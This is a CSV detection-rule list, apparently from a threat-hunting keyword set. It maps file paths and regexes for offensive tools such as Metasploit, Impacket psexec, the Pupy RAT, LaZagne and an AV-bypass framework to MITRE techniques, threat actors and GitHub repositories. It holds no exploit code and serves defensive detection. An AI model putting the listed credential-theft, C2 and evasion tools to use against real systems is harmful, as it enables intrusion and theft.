"*/psexec.json*",".{0,1000}\/psexec\.json.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9964"
"*/psexec.py*",".{0,1000}\/psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9965"
"*/psexecsvc.py*",".{0,1000}\/psexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","1","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","9966"
"*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9967"
"*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","9968"
"*/psgetsystem.git*",".{0,1000}\/psgetsystem\.git.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","9969"
"*/PSInject.ps1*",".{0,1000}\/PSInject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9970"
"*/PSLessExec.exe*",".{0,1000}\/PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9971"
"*/PsMapExec.git*",".{0,1000}\/PsMapExec\.git.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","9974"
"*/PsMapExec/*",".{0,1000}\/PsMapExec\/.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","9975"
"*/PSnmap.git*",".{0,1000}\/PSnmap\.git.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9976"
"*/PSnmap.ps1*",".{0,1000}\/PSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9977"
"*/PSnmap.psd1*",".{0,1000}\/PSnmap\.psd1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9978"
"*/PSnmap.psm1*",".{0,1000}\/PSnmap\.psm1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9979"
"*/psnuffle*",".{0,1000}\/psnuffle.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9980"
"*/psobf.git*",".{0,1000}\/psobf\.git.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","1","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","9981"
"*/PSObfucate.py*",".{0,1000}\/PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","9982"
"*/PSpersist.git*",".{0,1000}\/PSpersist\.git.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","9983"
"*/pspy -*",".{0,1000}\/pspy\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9984"
"*/PSPY.dll*",".{0,1000}\/PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9985"
"*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9986"
"*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9987"
"*/pspy.go*",".{0,1000}\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9988"
"*/pspy/cmd*",".{0,1000}\/pspy\/cmd.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9989"
"*/pspy/cmd/*",".{0,1000}\/pspy\/cmd\/.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9990"
"*/pspy/pspy.go*",".{0,1000}\/pspy\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9991"
"*/pspy32*",".{0,1000}\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9992"
"*/pspy64*",".{0,1000}\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9993"
"*/PSRansom -*",".{0,1000}\/PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","9994"
"*/psscanner.go*",".{0,1000}\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9995"
"*/psscanner/psscanner.go*",".{0,1000}\/psscanner\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9996"
"*/PSSW100AVB*",".{0,1000}\/PSSW100AVB.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","9997"
"*/pswRecovery4Moz.txt*",".{0,1000}\/pswRecovery4Moz\.txt.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","9998"
"*/pth-toolkit.git*",".{0,1000}\/pth\-toolkit\.git.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","9999"
"*/ptunnel-ng*",".{0,1000}\/ptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","10000"
"*/puckiestyle/CVE-2022-0847*",".{0,1000}\/puckiestyle\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","10001"
"*/puppet-naivesigning.nse*",".{0,1000}\/puppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10005"
"*/pupwinutils/*.py*",".{0,1000}\/pupwinutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10006"
"*/pupy/*.py*",".{0,1000}\/pupy\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10007"
"*/pupy/commands/*",".{0,1000}\/pupy\/commands\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10008"
"*/pupy/external/creddump7*",".{0,1000}\/pupy\/external\/creddump7.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10009"
"*/pupy/memimporter/*",".{0,1000}\/pupy\/memimporter\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10010"
"*/pupy/output/pupyx64*.exe*",".{0,1000}\/pupy\/output\/pupyx64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10011"
"*/pupy/pupygen.py*",".{0,1000}\/pupy\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10012"
"*/pupy_load.*",".{0,1000}\/pupy_load\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10013"
"*/PupyCmd.py*",".{0,1000}\/PupyCmd\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10014"
"*/PupyCompile.py*",".{0,1000}\/PupyCompile\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10015"
"*/pupygen.py*",".{0,1000}\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10016"
"*/pupylib/payloads/*",".{0,1000}\/pupylib\/payloads\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10017"
